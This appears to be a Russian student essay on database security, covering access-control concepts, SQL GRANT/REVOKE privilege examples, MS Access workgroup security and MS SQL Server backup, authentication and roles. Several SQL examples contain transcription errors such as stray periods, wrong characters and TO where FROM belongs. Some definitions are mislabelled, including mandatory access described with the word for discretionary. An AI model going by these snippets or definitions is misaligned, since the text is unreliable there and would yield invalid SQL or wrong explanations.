Современные СУБД в основном являются приложениями Windows, так как данная среда позволяет более полно использовать возможности персональной ЭВМ, нежели среда DOS. Снижение стоимости высокопроизводительных ПК обусловил не только широкий переход к среде Windows, где разработчик программного обеспечения может в меньше степени заботиться о распределении ресурсов, но также сделал программное обеспечение ПК в целом и СУБД в частности менее критичными к аппаратным ресурсам ЭВМ. Среди наиболее ярких представителей систем управления базами данных можно отметить: Lotus Approach, Microsoft Access, Borland dBase, Borland Paradox, Microsoft Visual FoxPro, Microsoft Visual Basic, а также баз данных Microsoft SQL Server и Oracle, используемые в приложениях, построенных по технологии «клиент-сервер».
Проблема обеспечения защиты информации является одной из важнейших при построении надежной информационной структуры учреждения на базе ЭВМ. Эта проблема охватывает как физическую защиту данных и системных программ, так и защиту от несанкционированного доступа к данным, передаваемым по линиям связи и находящимся на накопителях, являющегося результатом деятельности как посторонних лиц, так и специальных программ-вирусов. Таким образом, в понятие защиты данных включаются вопросы сохранения целостности данных и управления доступа к данным (санкционированность).
Технологический аспект данного вопроса связан с различными видами ограничений, которые поддерживаются структурой СУБД и должны быть доступны пользователю. К ним относятся:
-ограничение обновления определенных атрибутов с целью сохранения требуемых пропорций между их старыми и новыми значениями;
-ограничения, требующие сохранение значений поля показателя в некотором диапазоне;
-ограничения, связанные с заданными функциональными зависимостями.
Обычно в СУБД в язык манипулирования данными уже закладываются необходимые компоненты реализации указанных ограничений. Проблема обеспечения санкционированности использования данных является неоднозначной, но в основном охватывает вопросы защиты данных от нежелательной модификации или уничтожения, а также от несанкционированного их чтения.
В данной работе я затрагиваю основные аспекты защиты баз данных, их реализацию на примерах конкретных СУБД, а так же юридическую сторону данного вопроса.
Защита информации
Понятие защиты информации
Защита информации — комплекс мероприятий, направленных на обеспечение важнейших аспектов информационной безопасности (целостности, доступности и, если нужно, конфиденциальности информации и ресурсов, используемых для ввода, хранения, обработки и передачи данных) [1].
Система называется безопасной, если она, используя соответствующие аппаратные и программные средства, управляет доступом к информации так, что только должным образом авторизованные лица или же действующие от их имени процессы получают право читать, писать, создавать и удалять информацию.
Очевидно, что абсолютно безопасных систем нет, и здесь речь идет о надежной системе в смысле «система, которой можно доверять» (как можно доверять человеку). Система считается надежной, если она с использованием достаточных аппаратных и программных средств обеспечивает одновременную обработку информации разной степени секретности группой пользователей без нарушения прав доступа.
Основными критериями оценки надежности являются: политика безопасности и гарантированность.
Политика безопасности, являясь активным компонентом защиты (включает в себя анализ возможных угроз и выбор соответствующих мер противодействия), отображает тот набор законов, правил и норм поведения, которым пользуется конкретная организация при обработке, защите и распространении информации.
Выбор конкретных механизмов обеспечения безопасности системы производится в соответствии со сформулированной политикой безопасности.
Гарантированность, являясь пассивным элементом защиты, отображает меру доверия, которое может быть оказано архитектуре и реализации системы (другими словами, показывает, насколько корректно выбраны механизмы, обеспечивающие безопасность системы).
В надежной системе должны регистрироваться все происходящие события, касающиеся безопасности (должен использоваться механизм подотчетности протоколирования, дополняющийся анализом запомненной информации, то есть аудитом).
При оценке степени гарантированное, с которой систему можно считать надежной, центральное место занимает достоверная (надежная) вычислительная база. Достоверная вычислительная база (ДВЕ) представляет собой полную совокупность защитных механизмов компьютерной системы, которая используется для претворения в жизнь соответствующей политики безопасности.
Надежность ДВБ зависит исключительно от ее реализации и корректности введенных данных (например, данных о благонадежности пользователей, определяемых администрацией).
Граница ДВБ образует периметр безопасности. Компоненты ДВБ, находящиеся внутри этой границы, должны быть надежными (следовательно, для оценки надежности компьютерной системы достаточно рассмотреть только ее ДВБ). От компонентов, находящихся вне периметра безопасности, вообще говоря, не требуется надежности. Однако это не должно влиять на безопасность системы. Так как сейчас широко применяются распределенные системы обработки данных, то под «периметром безопасности» понимается граница владений определенной организации, в подчинении которой находится эта система. Тогда по аналогии то, что находится внутри этой границы, считается надежным. Посредством шлюзовой системы, которая способна противостоять потенциально ненадежному, а может быть даже и враждебному окружению, осуществляется связь через эту границу.
Контроль допустимости выполнения субъектами определенных операций над объектами, то есть функции мониторинга, выполняется достоверной вычислительной базой. При каждом обращении пользователя к программам или данным монитор проверяет допустимость данного обращения (согласованность действия конкретного пользователя со списком разрешенных для него действий). Реализация монитора обращений называется ядром безопасности, на базе которой строятся все защитные механизмы системы. Ядро безопасности должно гарантировать собственную неизменность.
Защита ПК от несанкционированного доступа
Как показывает практика, несанкционированный доступ (НСД) представляет одну из наиболее серьезных угроз для злоумышленного завладения защищаемой информацией в современных АСОД. Как ни покажется странным, но для ПК опасность данной угрозы по сравнению с большими ЭВМ повышается, чему способствуют следующие объективно существующие обстоятельства:
1) подавляющая часть ПК располагается непосредственно в рабочих комнатах специалистов, что создает благоприятные условия для доступа к ним посторонних лиц;
2) многие ПК служат коллективным средством обработки информации, что обезличивает ответственность, в том числе и за защиту информации;
3) современные ПК оснащены несъемными накопителями на ЖМД очень большой емкости, причем информация на них сохраняется даже в обесточенном состоянии;
4) накопители на ГМД производятся в таком массовом количестве, что уже используются для распространения информации так же, как и бумажные носители;
5) первоначально ПК создавались именно как персональное средство автоматизации обработки информации, а потому и не оснащались специально средствами защиты от НСД.
В силу сказанного те пользователи, которые желают сохранить конфиденциальность своей информации, должны особенно позаботиться об оснащении используемой ПК высокоэффективными средствами защиты от НСД.
Основные механизмы защиты ПК от НСД могут быть представлены следующим перечнем:
1) физическая защита ПК и носителей информации;
2) опознавание (аутентификация) пользователей и используемых компонентов обработки информации;
3) разграничение доступа к элементам защищаемой информации;
4) криптографическое закрытие защищаемой информации, хранимой на носителях (архивация данных);
5) криптографическое закрытие защищаемой информации в процессе непосредственной ее обработки;
6) регистрация всех обращений к защищаемой информации. Ниже излагаются общее содержание и способы использования перечисленных механизмов.
Защита информации в базах данных
В современных СУБД поддерживается один из двух наиболее общих подходов к вопросу обеспечения безопасности данных: избирательный подход и обязательный подход. В обоих подходах единицей данных или «объектом данных», для которых должна быть создана система безопасности, может быть как вся база данных целиком, так и любой объект внутри базы данных.
Эти два подхода отличаются следующими свойствами:
В случае избирательного управления некоторый пользователь обладает различными правами (привилегиями или полномочиями) при работе с данными объектами. Разные пользователи могут обладать разными правами доступа к одному и тому же объекту. Избирательные права характеризуются значительной гибкостью.
В случае избирательного управления, наоборот, каждому объекту данных присваивается некоторый классификационный уровень, а каждый пользователь обладает некоторым уровнем допуска. При таком подходе доступом к определенному объекту данных обладают только пользователи с соответствующим уровнем допуска.
Для реализации избирательного принципа предусмотрены следующие методы. В базу данных вводится новый тип объектов БД — это пользователи. Каждому пользователю в БД присваивается уникальный идентификатор. Для дополнительной защиты каждый пользователь кроме уникального идентификатора снабжается уникальным паролем, причем если идентификаторы пользователей в системе доступны системному администратору, то пароли пользователей хранятся чаще всего в специальном кодированном виде и известны только самим пользователям.
Пользователи могут быть объединены в специальные группы пользователей. Один пользователь может входить в несколько групп. В стандарте вводится понятие группы PUBLIC, для которой должен быть определен минимальный стандартный набор прав. По умолчанию предполагается, что каждый вновь создаваемый пользователь, если специально не указано иное, относится к группе PUBLIC.
Привилегии или полномочия пользователей или групп — это набор действий (операций), которые они могут выполнять над объектами БД.
В последних версиях ряда коммерческих СУБД появилось понятие «роли». Роль — это поименованный набор полномочий. Существует ряд стандартных ролей, которые определены в момент установки сервера баз данных. И имеется возможность создавать новые роли, группируя в них произвольные полномочия. Введение ролей позволяет упростить управление привилегиями пользователей, структурировать этот процесс. Кроме того, введение ролей не связано с конкретными пользователями, поэтому роли могут быть определены и сконфигурированы до того, как определены пользователи системы.
Пользователю может быть назначена одна или несколько ролей.
Объектами БД, которые подлежат защите, являются все объекты, хранимые в БД: таблицы, представления, хранимые процедуры и триггеры. Для каждого типа объектов есть свои действия, поэтому для каждого типа объектов могут быть определены разные права доступа.
На самом элементарном уровне концепции обеспечения безопасности баз данных исключительно просты. Необходимо поддерживать два фундаментальных принципа: проверку полномочий и проверку подлинности (аутентификацию).
Проверка полномочий основана на том, что каждому пользователю или процессу информационной системы соответствует набор действий, которые он может выполнять по отношению к определенным объектам. Проверка подлинности означает достоверное подтверждение того, что пользователь или процесс, пытающийся выполнить санкционированное действие, действительно тот, за кого он себя выдает.
Система назначения полномочий имеет в некотором роде иерархический характер. Самыми высокими правами и полномочиями обладает системный администратор или администратор сервера БД. Традиционно только этот тип пользователей может создавать других пользователей и наделять их определенными полномочиями.
СУБД в своих системных каталогах хранит как описание самих пользователей, так и описание их привилегий по отношению ко всем объектам.
Далее схема предоставления полномочий строится по следующему принципу. Каждый объект в БД имеет владельца — пользователя, который создал данный объект. Владелец объекта обладает всеми правами-полномочиями на данный объект, в том числе он имеет право предоставлять другим пользователям полномочия по работе с данным объектом или забирать у пользователей ранее предоставленные полномочия.
В ряде СУБД вводится следующий уровень иерархии пользователей — это администратор БД. В этих СУБД один сервер может управлять множеством СУБД (например, MS SQL Server, Sybase). В СУБД Oracle применяется однобазовая архитектура, поэтому там вводится понятие подсхемы — части общей схемы БД и вводится пользователь, имеющий доступ к подсхеме. В стандарте SQL не определена команда создания пользователя, но практически во всех коммерческих СУБД создать пользователя можно не только в интерактивном режиме, но и программно с использованием специальных хранимых процедур. Однако для выполнения этой операции пользователь должен иметь право на запуск соответствующей системной процедуры.
В стандарте SQL определены два оператора: GRANT и REVOKE соответственно предоставления и отмены привилегий.
Оператор предоставления привилегий имеет следующий формат:
GRANT {<список действий | ALL PRIVILEGES }
ON <имя_объекта> ТО (<имя_пользователя> ] PUBLIC } [WITH GRANT OPTION ]
Здесь список действий определяет набор действий из общедопустимого перечня действий над объектом данного типа.
Параметр ALL PRIVILEGES указывает, что разрешены все действия из допустимых для объектов данного типа.
<имя_обьекта> — задает имя конкретного объекта: таблицы, представления, хранимой процедуры, триггера.
<имя_пользователя> или PUBLIC определяет, кому предоставляются данные привилегии.
Параметр WITH GRANT OPTION является необязательным и определяет режим, при котором передаются не только права на указанные действия, но и право передавать эти права другим пользователям. Передавать права в этом случае пользователь может только в рамках разрешенных ему действий.
Рассмотрим пример, пусть у нас существуют три пользователя с абсолютно уникальными именами userl, user2 и user3. Все они являются пользователями одной БД.
User1 создал объект Таb1, он является владельцем этого объекта и может передать права на работу с эти объектом другим пользователям. Допустим, что пользователь user2 является оператором, который должен вводить данные в Таb1 (например, таблицу новых заказов), а пользователь user 3 является большим начальником (например, менеджером отдела), который должен регулярно просматривать введенные данные.
Для объекта типа таблица полным допустимым перечнем действий является набор из четырех операций: SELECT, INSERT, DELETE, UPDATE. При этом операция обновление может быть ограничена несколькими столбцами.
Общий формат оператора назначения привилегий для объекта типа таблица будет иметь следующий синтаксис:
GRANT {[SELECT][.INSERT][,DELETED[.UPDATE (<список столбцов>)]} ON <имя таблицы>
ТО {<имя_пользователя> PUBLIC }
[WITH GRANT OPTION ]
Тогда резонно будет выполнить следующие назначения:
GRANT INSERT
ON Tab1
ТО user2 GRANT SELECT
ON Tab1
TO user3
Эти назначения означают, что пользователь user2 имеет право только вводить новые строки в отношение Таb1> а пользователь user3 имеет право просматривать все строки в таблице Таb1.
При назначении прав доступа на операцию модификации можно уточнить, значение каких столбцов может изменять пользователь. Допустим, что менеджер отдела имеет право изменять цену на предоставляемые услуги. Предположим, что цена задается в столбце COST таблицы Таb1. Тогда операция назначения привилегий пользователю user3 может измениться и выглядеть следующим образом:
GRANT SELECT. UPDATE (COST) ON Tab1 TO user3
Если наш пользователь user1 предполагает, что пользователь user4 может его замещать в случае его отсутствия, то он может предоставить этому пользователю все права по работе с созданной таблицей Таb1.
GRANT ALL PRIVILEGES
ON Tab1
TO user4 WITH GRANT OPTION
В этом случае пользователь user4 может сам назначать привилегии по работе с таблицей Таb1 в отсутствие владельца объекта пользователя user1. Поэтому в случае появления нового оператора пользователя user5 он может назначить ему права на ввод новых строк в таблицу командой
GRANT INSERT
ON Tab1 TO user5
Если при передаче полномочий набор операций над объектом ограничен, то пользователь, которому переданы эти полномочия, может передать другому пользователю только те полномочия, которые есть у него, или часть этих полномочий. Поэтому если пользователю user4 были делегированы следующие полномочия:
GRANT SELECT. UPDATE. DELETE
ON Tab1
TO user4 WITH GRANT OPTION,
то пользователь user4 не сможет передать полномочия на ввод данных пользователю user5, потому что эта операция не входит в список разрешенных для него самого.
Кроме непосредственного назначения прав по работе с таблицами эффективным методом защиты данных может быть создание представлений, которые будут содержать только необходимые столбцы для работы конкретного пользователя и предоставление прав на работу с данным представлением пользователю.
Так как представления могут соответствовать итоговым запросам, то для этих представлений недопустимы операции изменения, и, следовательно, для таких представлений набор допустимых действий ограничивается операцией SELECT. Если же представления соответствуют выборке из базовой таблицы, то для такого представления допустимыми будут все 4 операции: SELECT, INSERT, UPDATE и DELETE.
Для отмены ранее назначенных привилегий в стандарте SQL определен оператор REVOKE. Оператор отмены привилегий имеет следующий синтаксис:
REVOKE {<список операций | ALL PRIVILEGES} ON <имя_объекта>
FROM {<список пользователей | PUBLIC } {CASCADE | RESTRICT }
Параметры CASCADE или RESTRICT определяют, каким образом должна производиться отмена привилегий. Параметр CASCADE отменяет привилегии не только пользователя, который непосредственно упоминался в операторе GRANT при предоставлении ему привилегий, но и всем пользователям, которым этот пользователь присвоил привилегии, воспользовавшись параметром WITH GRANT OPTION.
Например, при использовании операции:
REVOKE ALL PRIVILEGES - ON Tab1 TO user4 CASCADE
будут отменены привилегии и пользователя user5, которому пользователь user4 успел присвоить привилегии.
Параметр RESTRICKT ограничивает отмену привилегий только пользователю, непосредственно упомянутому в операторе REVOKE. Но при наличии делегированных привилегий этот оператор не будет выполнен. Так, например, операция:
REVOKE ALL PRIVILEGES ON Tab1 TO user4 RESTRICT
не будет выполнена, потому что пользователь user4 передал часть своих полномочий пользователю user5.
Посредством оператора REVOKE можно отобрать все или только некоторые из ранее присвоенных привилегий по работе с конкретным объектом. При этом из описания синтаксиса оператора отмены привилегий видно, что можно отобрать привилегии одним оператором сразу у нескольких пользователей или у целой группы PUBLIC.
Поэтому корректным будет следующее использование оператора REVOKE:
REVOKE INSERT ON Tab! TO user2.user4 CASCADE
При работе с другими объектами изменяется список операций, которые используются в операторах GRANT и REVOKE.
По умолчанию действие, соответствующее запуску (исполнению) хранимой процедуры, назначается всем членам группы PUBLIC.
Если вы хотите изменить это условие, то после создания хранимой процедуры необходимо записать оператор REVOKE.
REVOKE EXECUTE ON COUNT_EX TO PUBLIC CASCADE И теперь мы можем назначить новые права пользователю user4.
GRANT EXECUTE ON COUNT_EX TO user4
Системный администратор может разрешить некоторому пользователю создавать и изменять таблицы в некоторой БД. Тогда он может записать оператор предоставления прав следующим образом:
GRANT CREATE TABLE. ALTER TABLE, DROP TABLE ON OB_LIB TO user1
В этом случае пользователь user1 может создавать, изменять или удалять таблицы в БД DB_LIB, однако он не может разрешить создавать или изменять таблицы в этой БД другим пользователям, потому что ему дано разрешение без права делегирования своих возможностей.
В некоторых СУБД пользователь может получить права создавать БД. Например, в MS SQL Server системный администратор может предоставить пользователю main_user право на создание своей БД на данном сервере. Это может быть сделано следующей командой:
GRANT CREATE DATABASE
ON SERVERJ) TO main user
По принципу иерархии пользователь main_user, создав свою БД, теперь может предоставить права на создание или изменение любых объектов в этой БД другим пользователям. В СУБД, которые поддерживают однобазовую архитектуру, такие разрешения недопустимы. Например, в СУБД Oracle на сервере создается только одна БД, но пользователи могут работать на уровне подсхемы (части таблиц БД и связанных с ними объектов). Поэтому там вводится понятие системных привилегий. Их очень много, 80 различных привилегий.
Для того чтобы разрешить пользователю создавать объекты внутри этой БД, используется понятие системной привилегии, которая может быть назначена одному или нескольким пользователям. Они выдаются только на действия и конкретный тип объекта. Поэтому- если вы, как системный администратор, предоставили пользователю право создания таблиц (CREATE TABLE), то для того чтобы он мог создать триггер для таблицы, ему необходимо предоставить еще одну системную привилегию CREATE TRIGGER. Система защиты в Oracle считается одной из самых мощных, но это имеет и обратную сторону — она весьма сложная. Поэтому задача администрирования в Oracle требует хорошего знания как семантики принципов поддержки прав доступа, так и физической реализации этих возможностей.
Реализация защиты в некоторых СУБД
Архитектура защиты Access
Если у вас имеется опыт работы с защитой, используемой на сервере или большой ЭВМ, структура защиты в Access покажется вам знакомой. Вы можете указать пользователей, которым предоставляется или, наоборот, не разрешается доступ к объектам базы данных. Кроме того, вы можете определить группы пользователей и назначить разрешения на уровне группы, чтобы облегчить построение защиты для большого числа пользователей. Пользователю достаточно быть членом группы, чтобы получить права доступа, установленные для неё.
Access хранит информацию о защите в двух местах. Во время установки программа Setup создаст в папке \Program Files\Microsoft Ofice\0ffice стандартный файл рабочей группы (System.mdw), который впоследствии используется по умолчанию при запуске Access. Этот файл содержит информацию обо всех пользователях и группах. При создании базы данных Access сохраняет сведения о правах, предоставляемых конкретным пользователям и группам, в файле базы данных.
Общая структура защиты Access отображена на рисунке 1. Учётные записи пользователей и групп хранятся в файле рабочей группы. Разрешение на доступ к конкретным объектам сохраняются в файле базы данных.
Рабочая группа
(обычно System.mdw)
Код рабочей группы
Пользователи
Код пользователя
Группы
Код группы
База данных приложения
(таблицы, запросы, формы,
отчеты, модули),
принадлежащая рабочей группе
Объект
Разрешение на доступ к объекту
Код пользователя или группы
Рис. 1
Расположение текущего файла рабочей группы хранится в реестре Windows. Можно использовать служебную программу Wrkadm.exe (администратор рабочих групп) для изменения текущего или определения нового файла рабочей группы. Кроме того, можно выбирать нужный файл рабочей группы во время выполнения приложения, задав соответствующий параметр командной строки в ярлыке запуска. Если вам приходится часто запускать в сети совместно используемое защищенное приложение, нужно позаботиться о том, чтобы системный администратор задал вашу рабочую группу, используемую по умолчанию, как общий файл в сетевой папке.
Каждая рабочая группа имеет уникальный внутренний идентификатор, генерируемый Access при определении файла рабочих групп. Любая база данных, созданная пользователем рабочей группы, «принадлежит» как этому пользователю, так и рабочей группе. Каждый пользователь и группа также имеет уникальный внутренний идентификатор, но можно дублировать один и тот же код пользователя и группы в нескольких рабочих группах. Когда вы назначаете право доступа к объекту своей базы данных, Access сохраняет в ней внутренний идентификатор пользователя или группы вместе с информацией о доступе. Таким образом, предоставленные вами права перемещаются вместе с файлом базы данных при копировании его в другую папку или на другой компьютер.
MS SQL Server
Организация защиты
В критических для бизнеса приложениях, когда сервер СУБД должен быть постоянно доступен для клиентов, большинство профилактических работ по поддержке базы данных приходится выполнять фактически в режиме on - line. MS SQL Server обладает возможностями динамического резервного копирования данных, т. е. даже когда эти данные используются и изменяются клиентами. В случае сбоя оборудования, отключения питания и т. д. механизм автоматического восстановления MS SQL Server восстанавливает все базы данных до их последнего целостного состояния без вмешательства администратора. Все завершенные, но не отраженные в базе транзакции из журнала транзакций применяются к базе данных (это фактически то, что происходит при событии chekpoint), а незавершенные транзакции, т. е. те, которые были активными на момент сбоя, вычищаются из журнала.
Говоря о симметричной архитектуре, операции резервного копирования и восстановления могут распараллеливаться на несколько потоков и выполняться одновременно, используя преимущества асинхронного ввода/вывода. На каждое резервное устройство отводится свой поток. Параллельное резервное копирование поддерживает до 32 одновременных резервных устройств (backup devices), что позволяет быстро создавать страховочные копии баз данных даже очень большой емкости. Возможность резервного копирования и восстановления отдельных таблиц, о чем мы упоминали, рассматривая Transact-SQL, позволяет экономить место и время, не выполняя копирование всей базы ради только некоторых ее объектов. Однако резервное копирование отдельной таблицы требует наложения на нее блокировки exclusive в отличие от резервного копирования всей базы или журнала транзакций, которые могут выполняться независимо от степени активности пользователей. Резервным копиям может быть назначен предельный срок хранения или дата утраты актуальности, до наступления которой место, занятое на устройстве этими копиями, не может использоваться для размещения других резервных копий при инициализации устройства. В качестве резервных устройств могут также применяться временные устройства, не входящие в состав базы и не имеющие записей в системной таблице sysdevices:
DECLARE @tomorrow char(8)
SELECT @tomorrow = CONVERT(char(8), DATEADD(dd, 1, GETDATE()) , 1)
DUMP DATABASE pubs
TO DISK = '\\ntalexeysh\disk_d\sql_experiments\pubs.dmp'
WITH INIT, EXPIREDATE=@tomorrow, STATS
Для небольшой базы данных ее журнал транзакций обычно хранится на том же устройстве, что и сама база, и архивируется вместе с ней. Журналирование транзакций ведется по принципу write-ahead, что означает, что любое изменение сначала отражается в журнале транзакций и лишь потом попадает собственно в базу. В случае нахождения журнала транзакций на отдельном устройстве существует возможность отдельного резервного копирования журнала транзакций. Как правило, резервное копирование базы данных организуется с меньшей частотой, чем журнала транзакций. Например, сохранение журнала транзакций выполняется ежедневно, а страховая копия всей базы может делаться раз в неделю, так как архивирование журнала транзакций происходит значительно быстрее по времени и занимает меньше места, чем дамп целой базы. В отличие от резервирования базы данных дамп журнала транзакций очищает его неактивную часть, т. е. все завершившиеся (зафиксированные или абортированные) с момента последнего дампа транзакции, если только не использована опция NO_TRUNCATE. Команда DUMP TRANSACTION TRUNCATE_ONLY, очищающая журнал транзакций, полезна в случае его переполнения, которое можно контролировать, например, оператором DBCC SQLPERF (LOGSPACE). Если степень переполнения журнала очень высока, можно при его очистке отказаться от журналирования факта самого этого события: DUMP TRANSACTION NO_LOG. Если резервное копирование транзакций не представляет интереса, можно включить опцию очистки последних завершенных транзакций в базе по наступлению события checkpoint. Cмысл механизма checkpoint состоит в периодической записи данных из кэша на диск, чтобы не допускать грязных данных. Такого рода события постоянно генерируются MS SQL Server или возникают по инициативе пользователя. Включенная опция truncate log on checkpoint гарантирует выполнение с определенной частотой обработчиком события действий, приблизительно эквивалентных команде DUMP TRANSACTION TRUNCATE_ONLY.
При восстановлении журнала транзакций соответствующие транзакции применяются к базе данных. Это означает, что если в начале недели была сделана резервная копия всей базы, а потом ежедневно архивировались транзакции за каждый день, то при необходимости восстановления поднимается состояние базы на начало недели и на него последовательно накатываются дампы журнала транзакций за все дни, предшествующие моменту восстановления. MS SQL Server 6.5 имеет возможность восстановления данных из журнала транзакций на произвольный момент времени (разумеется, отраженный в журнале) при помощи команды LOAD TRANSACTION STOPAT <t> или в окне database backup and restore выбором опции until time. Все содержащиеся в этом дампе транзакции, отмеченные завершившимися после этого момента, будут откачены.
Возможность планирования задач резервного копирования во времени и отсылки сообщений по e-mail в случае успешного/неуспешного завершения рассматривалась нами при обсуждении SQL Executive.
MS SQL Server 6.5 предусматривает возможность зеркалирования устройств, переключения на зеркальные устройства в качестве основных, выключения зеркалирования и уничтожения зеркального устройства также "на лету", т. е. без остановки штатной работы сервера по обслуживанию пользовательских запросов. Зеркалирование и дуплексирование устройств для работы с MS SQL Server может быть также выполнено средствами Windows NT, а также на аппаратном уровне (поддержка различных RAID-систем и т. д.). По-видимому, следует предполагать, что реализация первого этапа кластерной технологии WolfPack будет поддерживать MS SQL Server 6.5 в отказоустойчивых кластерах из двух узлов. Появление следующей версии MS SQL Server должно обеспечить работу серверов в кластере как единого виртуального сервера.
Transfer Manager используется для экспорта/импорта объектов и данных БД на MS SQL Server между разными аппаратными платформами, например между процессорами Intel и Alpha, а также между разными версиями MS SQL Server, в частности из более ранних в более поздние или между равноценными (имеются в виду 4.х и 6.х). Очень часто проектирование объектов базы ведется с помощью различных графических средств, но проектная документация может требовать структуру объектов с точностью до операторов DDL. Для получения скриптов, описывающих создание отдельного объекта базы данных, можно использовать команду transfer из контекстного меню объекта или выбрать соответствующий класс и имя объекта в Transfer Manager. Кроме этого, содержимое данных может быть выгружено/загружено при помощи утилиты bcp (см. табл. 1).
Вопросы безопасности доступа
Говоря о преимуществах интеграции с операционной системой, MS SQL Server использует в своей работе сервисы безопасности Windows NT. Напомним, что Windows NT на сегодня сертифицирована по классам безопасности С2/Е3. MS SQL Server может быть настроен на работу в одном из трех режимах безопасности. Интегрированный режим предусматривает использование механизмов аутентификации Windows NT для обеспечения безопасности всех пользовательских соединений. В этом случае к серверу разрешаются только трастовые, или аутентифицирующие, соединения (named pipes и multiprotocol). Администратор имеет возможность отобразить группы пользователей Windows NT на соответствующие значения login id MS SQL Server при помощи утилиты SQL Security Manager. В этом случае при входе на MS SQL Server login name и пароль, переданные через DB-Library или ODBC, игнорируются. Стандартный режим безопасности предполагает, что на MS SQL Server будут заводиться самостоятельные login id и соответствующие им пароли. Смешанный режим использует интегрированную модель при установлении соединений по поименованным каналам или мультипротоколу и стандартную модель во всех остальных случаях.
MS SQL Server обеспечивает многоуровневую проверку привилегий при загрузке на сервер. Сначала идентифицируются права пользователя на установление соединения с выбранным сервером (login name и пароль) и выполнение административных функций: создание устройств и баз данных, назначение прав другим пользователям, изменение параметров настройки сервера и т.д. Максимальными правами обладает системный администратор. На уровне базы данных каждый пользователь, загрузившийся на сервер, может иметь имя пользователя (username) базы и права на доступ к объектам внутри нее. Имеется возможность отобразить нескольких login id на одного пользователя базы данных, а также объединять пользователей в группы для удобства администрирования и назначения сходных привилегий. По отношению к объектам базы данных пользователю могут быть назначены права на выполнение различных операций над ними: чтение, добавление, удаление, изменение, декларативная ссылочная целостность (DRI), выполнение хранимых процедур, а также права на доступ к отдельным полям. Если этого недостаточно, можно прибегнуть к представлениям (views), для которых сказанное остается справедливым. Наконец, можно вообще запретить пользователю непосредственный доступ к данным, оставив за ним лишь права на выполнение хранимых процедур, в которых будет прописан весь сценарий его доступа к базе. Хранимые процедуры могут создаваться с опцией WITH ENCRYPTION, которая шифрует непосредственный текст процедуры, хранящийся обычно в syscomments. Права на выполнение некоторых команд (создание баз, таблиц, умолчаний, правил, представлений, процедур, резервное копирование баз и журналов транзакций) не являются объектно-специфичными, поэтому они назначаются системным администратором сервера или владельцем (создателем) базы данных при редактировании базы данных. Администрирование пользовательских привилегий обычно ведется в SQL Enterprise Manager, тем не менее в Transact-SQL имеются хранимые процедуры (sp_addlogin, sp_password, sp_revokelogin, sp_addalias, sp_adduser) и операторы (GRANT, REVOKE), которые позволяют осуществлять действия по созданию пользователей, назначению и отмене прав при выполнении скриптов. Дополнительную возможность администрирования привилегий предоставляют рассмотренные нами выше SQL-DMO.
Управление доступом
Система безопасности SQL Server имеет несколько уровней безопасности:
• операционная система;
• SQL Server;
• база данных;
• объект базы данных.
С другой стороны механизм безопасности предполагает существование четырех типов пользователей:
• системный администратор, имеющий неограниченный доступ;
• владелец БД, имеющий полный доступ ко всем объектам БД;
• владелец объектов БД;
• другие пользователи, которые должны получать разрешение на доступ к объектам БД.
Модель безопасности SQL Server включает следующие компоненты:
• тип подключения к SQL Server;
• пользователь базы данных;
• пользователь (guest);
• роли (roles).
Тип подключения к SQL Server
При подключении (и в зависимости от типа подключения) SQL Server поддерживает два режима безопасности:
• режим аутентификации Windows NT;
• смешанный режим аутентификации.
В режиме аутентификации Windows NT используется система безопасности Windows NT и ее механизм учетных записей. Этот режим позволяет SQL Server использовать имя пользователя и пароль, которые определены в Windows, и тем самым обходить процесс подключения к SQL Server. Таким образом, пользователи, имеющие действующую учетную запись Windows, могут подключиться к SQL Server, не сообщая своего имени и пароля. Когда пользователь обращается к СУБД, последняя получает информацию об имени пользователя и пароле из атрибутов системы сетевой безопасности пользователей Windows (которые устанавливаются, когда пользователь подключается к Windows).
В смешанном режиме аутентификации задействованы обе системы аутентификации: Windows и SQL Server. При использовании системы аутентификации SQL Server отдельный пользователь, подключающийся к SQL Server, должен сообщить имя пользователя и пароль, которые будут сравниваться с хранимыми в системной таблице сервера. При использовании системы аутентификации Windows пользователи могут подключиться к SQL Server, не сообщая имя и пароль.
Пользователи базы данных
Понятие пользователь базы данных относится к базе (или базам) данных, к которым может получить доступ отдельный пользователь. После успешного подключения сервер определяет, имеет ли этот пользователь разрешение на работу с базой данных, к которой обращается.
Единственным исключением из этого правила является пользователь guest (гость). Особое имя пользователя guest разрешает любому подключившемуся к SQL Server пользователю получить доступ к этой базе данных. Пользователю с именем guest назначена роль public.
Права доступа
Для управления правами доступа в SQL Server используются следующие команды:
• GRANT. Позволяет выполнять действия с объектом или, для команды — выполнять ее;
• REVOKE. Аннулирует права доступа для объекта или, для команды — не позволяет выполнить ее;
• DENY. He разрешает выполнять действия с объектом (в то время, как команда REVOKE просто удаляет эти права доступа).
Объектные права доступа позволяют контролировать доступ к объектам в SQL Server, предоставляя и аннулируя права доступа для таблиц, столбцов, представлений и хранимых процедур. Чтобы выполнить по отношению к некоторому объекту некоторое действие, пользователь должен иметь соответствующее право доступа. Например, если пользователь хочет выполнить оператор SELECT * FROM table, то он должен и меть права выполнения оператора SELECT для таблицы table.
Командные права доступа определяет тех пользователей, которые могут выполнять административные действия, например, создавать или копировать базу данных. Нижеприведены командные права доступа:
CREATE DATABASE — право создения базы данных;
CREATE DEFAULT — право создшия стандартного значения для столбца таблицы;
CREATE PROCEDURE — право содания хранимой процедуры.
CREATE ROLE — право создания гоавила для столбца таблицы;
CREATE TABLE — право создания таблицы;
CREATE VIEW — право создания представления;
BACKUP DATABASE — право создшия резервной копии;
BACKUP TRANSACTION — праве создания резервной копии журнала транзакций.
Роли
Назначение пользователю некоторой рели позволяет ему выполнять все функции, разрешенные этой рольо. По сути роли логически группируют пользователей, имеющих одинаковые права доступа. В SQL Server есть следующие типы ролей:
• роли уровня сервера;
• роли уровня базы данных.
Роли уровня сервера
С помощью этих ролей предоставляются различные степени доступа к операциям и задачам сервер*. Роли уровня сервера заранее определены и действуют в пределах сервера. Они не зависят от конкретных баз данных, и их нельзя модифицировать.
В SQL Server существуют следующие типы ролей уровня сервера:
Sysadmin — дает право выполнить любое действие в SQL Server;
Serveradmin — дает право изменить параметры SQL Server и завершить его работу;
Setupadmin — дает право инсталлировать систему репликации и управлять выполнением расширенных хранимых процедур;
Securityadmin — дает право контролировать параметры учетных записей для подключения к серверу и предоставлять права доступа к базам данных;
Processadmin — дает право управлять ходом выполнения процессов в SQL Server;
Dbcreator — дает право создавать и модифицировать базы данных;
Diskadmin — дает право управлять файлами баз данных на диске.
Роли уровня базы данных
Роли уровня базы данных позволяют назначить права для работы с конкретной базой данных отдельному пользователю или группе. Роли уровня базы данных можно назначать учетным записям пользователей в режиме аутентификации Windows или SQL Server. Роли могут быть и вложенными, так что учетным записям можно назначить иерархическую группу прав доступа.
